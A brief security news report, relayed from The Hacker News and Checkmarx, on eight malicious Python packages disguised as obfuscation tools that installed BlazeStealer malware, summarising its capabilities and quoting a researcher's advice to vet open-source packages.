Eight new Python packages masquerading as obfuscation tools have been used to facilitate the distribution of the BlazeStealer malware since January, The Hacker News reports.
Installation of the malicious packages immediately executes BlazeStealer, which then retrieves an external payload and runs a Discord bot to allow total device compromise, enabling attackers to exfiltrate browser-stored credentials and screenshots, perform file encryption, conduct arbitrary command execution, and disable Microsoft Defender, a report from Checkmarx revealed. BlazeStealer could also adversely affect the functionality of impacted devices through increased CPU utilization, machine shutdowns via Windows Batch script, and a blue screen of death error, according to researchers.
All of the packages, which were mostly downloaded in the U.S., China, Russia, and Ireland, have already been removed.
"The open-source domain remains a fertile ground for innovation, but it demands caution. Developers must remain vigilant, and vet the packages prior to consumption," said researcher Yehuda Gelb.